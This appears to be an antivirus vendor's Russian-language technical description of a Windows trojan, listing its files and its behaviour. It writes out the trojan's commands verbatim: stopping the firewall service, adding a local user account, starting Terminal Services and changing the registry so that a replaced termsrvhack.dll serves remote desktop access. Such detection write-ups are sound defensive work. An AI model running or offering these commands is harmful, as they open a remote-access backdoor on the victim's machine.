Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '<SYSTEM32>\yc.exe' 1.bat,1,1
Запускает на исполнение:
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' user 1 1 /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s 1 /add
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net1.exe' start dcomlaunch
- '<SYSTEM32>\svchost.exe' -k DcomLaunch
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\find.exe' "TermService"
- '<SYSTEM32>\taskkill.exe' /pid 840 /f
- '<SYSTEM32>\cmd.exe' /c 1.bat
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Завершает или пытается завершить
следующие системные процессы:
- <SYSTEM32>\svchost.exe
Изменения в файловой системе:
Создает следующие файлы:
- <SYSTEM32>\yc.exe
- <SYSTEM32>\3389.vbs
- <SYSTEM32>\1.bat
- <SYSTEM32>\termsrvhack.dll
Присваивает атрибут 'скрытый' для следующих файлов:
- <SYSTEM32>\termsrvhack.dll
Удаляет следующие файлы:
- <SYSTEM32>\3389.vbs
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
